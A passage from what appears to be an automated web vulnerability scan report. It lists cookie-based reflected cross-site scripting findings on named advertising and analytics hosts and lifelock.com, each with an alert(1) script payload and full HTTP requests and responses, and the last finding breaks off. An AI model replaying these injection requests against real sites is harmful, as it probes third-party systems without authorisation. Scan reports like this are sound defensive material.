The value of the UID cookie is copied into the HTML document as plain text between tags. The payload 69437<script>alert(1)</script>6795e865c60 was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run&1303613738787 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/news/security/attacks/229402094
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; UID=875e3f1e-184.84.247.65-130334904669437<script>alert(1)</script>6795e865c60; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 03:17:38 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Tue 29-Jul-2008 03:17:38 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 248

COMSCORE.BMX.Buddy.run({ "UID": '875e3f1e-184.84.247.65-130334904669437<script>alert(1)</script>6795e865c60', "BMX_3PC": '1', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&' });

2.111. http://ar.voicefive.com/b/node_rcAll.pli [ar_p91300630 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the ar_p91300630 cookie is copied into the HTML document as plain text between tags. The payload 83bdf<script>alert(1)</script>98406144f62 was submitted in the ar_p91300630 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run&1303613738787 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/news/security/attacks/229402094
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&83bdf<script>alert(1)</script>98406144f62; UID=875e3f1e-184.84.247.65-1303349046; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 03:17:38 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Tue 29-Jul-2008 03:17:38 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 248

COMSCORE.BMX.Buddy.run({ "UID": '875e3f1e-184.84.247.65-1303349046', "BMX_3PC": '1', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&83bdf<script>alert(1)</script>98406144f62' });

2.112. http://ar.voicefive.com/bmx3/node.pli [BMX_3PC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node.pli

Issue detail

The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload 1d12e<script>alert(1)</script>f044f07ba60 was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node.pli?pub=ubm HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/news/security/attacks/229402094
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; UID=875e3f1e-184.84.247.65-1303349046; BMX_3PC=11d12e<script>alert(1)</script>f044f07ba60

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 03:15:03 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 13462

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
ow.attachEvent){return window.attachEvent("onload",C.OnReady.onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Buddy.cookies={ "UID": '875e3f1e-184.84.247.65-1303349046', "BMX_3PC": '11d12e<script>alert(1)</script>f044f07ba60', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&' };
COMSCORE.BMX.Buddy.ServerTimeEpoch="1303614903";COMSCORE.BMX.Buddy.start(({"Co
...[SNIP]...

2.113. http://ar.voicefive.com/bmx3/node.pli [UID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload c8242<script>alert(1)</script>3748b3af4f8 was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node.pli?pub=ubm HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/news/security/attacks/229402094
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; UID=875e3f1e-184.84.247.65-1303349046c8242<script>alert(1)</script>3748b3af4f8

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 03:14:50 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 13445

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
);
}else{if(window.attachEvent){return window.attachEvent("onload",C.OnReady.onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Buddy.cookies={ "UID": '875e3f1e-184.84.247.65-1303349046c8242<script>alert(1)</script>3748b3af4f8', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&' };
COMSCORE.BMX.Buddy.ServerTimeEpoch="1303614890";COMSCORE.BMX.Buddy.start(({"Co
...[SNIP]...

2.114. http://ar.voicefive.com/bmx3/node.pli [ar_p91300630 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node.pli

Issue detail

The value of the ar_p91300630 cookie is copied into the HTML document as plain text between tags. The payload a63c0<script>alert(1)</script>e755c95c29a was submitted in the ar_p91300630 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node.pli?pub=ubm HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/news/security/attacks/229402094
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&a63c0<script>alert(1)</script>e755c95c29a; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 03:14:50 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 13445

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
null};})();}COMSCORE.BMX.Buddy.cookies={ "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&a63c0<script>alert(1)</script>e755c95c29a' };
COMSCORE.BMX.Buddy.ServerTimeEpoch="1303614890";COMSCORE.BMX.Buddy.start(({"Config":{"ControlList":[{Pid:"p41327062",RecruitFrequency:0,Inv:"inv_300x250",Version:3}],"MasterSettings":{"ExcludeUrl
...[SNIP]...

2.115. http://optimized-by.rubiconproject.com/a/6291/9346/15214-15.js [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6291/9346/15214-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7a27"-alert(1)-"704419ea05 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/6291/9346/15214-15.js?cb=0.6632191697135568 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.star-telegram.com/2011/04/23/3022014/your-smartphone-knows-where-youve.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_1185=2931142961646634775; put_2132=978972DFA063000D2C0E7A380BFA1DEC; put_2100=usr3fd49cb9a7122f52; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1986=2724386019227846218; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; csi2=3190986.js^1^1303430199^1303430199&3200790.js^1^1303430188^1303430188; put_1197=3419824627245671268; khaos=GMMM8SST-B-HSA1; cd=false; lm="21 Apr 2011 23:56:48 GMT"; rpb=5328%3D1%265671%3D1%264212%3D1%266286%3D1%266073%3D1%264210%3D1%265852%3D1%264894%3D1%264554%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; ruid=f7a27"-alert(1)-"704419ea05; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk=7556/12142; rdk5=0; ses5=12142^1

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:11:48 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6291/9346; expires=Sun, 24-Apr-2011 04:11:48 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Sun, 24-Apr-2011 04:11:48 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=9346^1; expires=Mon, 25-Apr-2011 04:59:59 GMT; max-age=103691; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3152145.js^1^1303614708^1303614708; expires=Sun, 01-May-2011 03:11:48 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2147

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3152145"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=f7a27"-alert(1)-"704419ea05\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

2.116. http://optimized-by.rubiconproject.com/a/7556/12142/21009-5.js [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7556/12142/21009-5.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee657"-alert(1)-"82b2db44a49 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/7556/12142/21009-5.js?cb=0.11715259146876633 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www2.wspa.com/news/2011/apr/22/computer-hackers-strike-more-often-2011-ar-1751321/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_1185=2931142961646634775; put_2132=978972DFA063000D2C0E7A380BFA1DEC; put_2100=usr3fd49cb9a7122f52; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1986=2724386019227846218; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; ruid=ee657"-alert(1)-"82b2db44a49; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; csi2=3190986.js^1^1303430199^1303430199&3200790.js^1^1303430188^1303430188; put_1197=3419824627245671268; khaos=GMMM8SST-B-HSA1; cd=false; lm="21 Apr 2011 23:56:48 GMT"; rpb=5328%3D1%265671%3D1%264212%3D1%266286%3D1%266073%3D1%264210%3D1%265852%3D1%264894%3D1%264554%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 04:06:01 GMT
Server: RAS/1.3 (Unix)
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: ruid=ee657"-alert(1)-"82b2db44a49^1^1303617961^2915161843; expires=Sat, 23-Jul-2011 04:06:01 GMT; max-age=7776000; path=/; domain=.rubiconproject.com;
Set-Cookie: rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; path=/; domain=.rubiconproject.com;
Set-Cookie: rdk=7556/12142; expires=Sun, 24-Apr-2011 05:06:01 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk5=0; expires=Sun, 24-Apr-2011 05:06:01 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses5=12142^1; expires=Mon, 25-Apr-2011 04:59:59 GMT; max-age=100438; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2165

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "1749423"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=ee657"-alert(1)-"82b2db44a49\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

2.117. http://optimized-by.rubiconproject.com/a/7556/12142/21075-2.js [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7556/12142/21075-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f849a"-alert(1)-"de2ba14b2ac was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/7556/12142/21075-2.js?cb=0.4007204193621874 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www2.wspa.com/news/2011/apr/22/computer-hackers-strike-more-often-2011-ar-1751321/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_1185=2931142961646634775; put_2132=978972DFA063000D2C0E7A380BFA1DEC; put_2100=usr3fd49cb9a7122f52; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1986=2724386019227846218; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_1197=3419824627245671268; khaos=GMMM8SST-B-HSA1; cd=false; lm="21 Apr 2011 23:56:48 GMT"; rpb=5328%3D1%265671%3D1%264212%3D1%266286%3D1%266073%3D1%264210%3D1%265852%3D1%264894%3D1%264554%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; ruid=f849a"-alert(1)-"de2ba14b2ac; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses5=12142^1; rdk15=0; ses15=9346^1; csi15=3188371.js^1^1303615864^1303615864; rdk=7963/12801; rdk2=0; ses2=12801^1; csi2=3153070.js^1^1303613706^1303613706

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:52:15 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7556/12142; expires=Sun, 24-Apr-2011 04:52:15 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Sun, 24-Apr-2011 04:52:15 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12801^1&12142^1; expires=Mon, 25-Apr-2011 04:59:59 GMT; max-age=101264; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2550

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3168960"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=f849a"-alert(1)-"de2ba14b2ac\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

2.118. http://optimized-by.rubiconproject.com/a/7963/12801/23470-2.js [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7963/12801/23470-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd5c6"-alert(1)-"83e1c532d15 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/7963/12801/23470-2.js?cb=0.6134995906613767 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.startribune.com/business/120319724.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_1185=2931142961646634775; put_2132=978972DFA063000D2C0E7A380BFA1DEC; put_2100=usr3fd49cb9a7122f52; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1986=2724386019227846218; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; csi2=3190986.js^1^1303430199^1303430199&3200790.js^1^1303430188^1303430188; put_1197=3419824627245671268; khaos=GMMM8SST-B-HSA1; cd=false; lm="21 Apr 2011 23:56:48 GMT"; rpb=5328%3D1%265671%3D1%264212%3D1%266286%3D1%266073%3D1%264210%3D1%265852%3D1%264894%3D1%264554%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; ruid=bd5c6"-alert(1)-"83e1c532d15; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses5=12142^1; rdk=6291/9346; rdk15=0; ses15=9346^1; csi15=3188371.js^1^1303615864^1303615864

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:32:55 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7963/12801; expires=Sun, 24-Apr-2011 04:32:55 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Sun, 24-Apr-2011 04:32:55 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12801^1; expires=Mon, 25-Apr-2011 04:59:59 GMT; max-age=102424; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3153070.js^1^1303615975^1303615975; expires=Sun, 01-May-2011 03:32:55 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 1929

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3153070"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=bd5c6"-alert(1)-"83e1c532d15\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

2.119. http://www.lifelock.com/contact/ [LifeLockEnrollment cookie]  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /contact/

Issue detail

The value of the LifeLockEnrollment cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dbe7"><script>alert(1)</script>653af69f8df was submitted in the LifeLockEnrollment cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

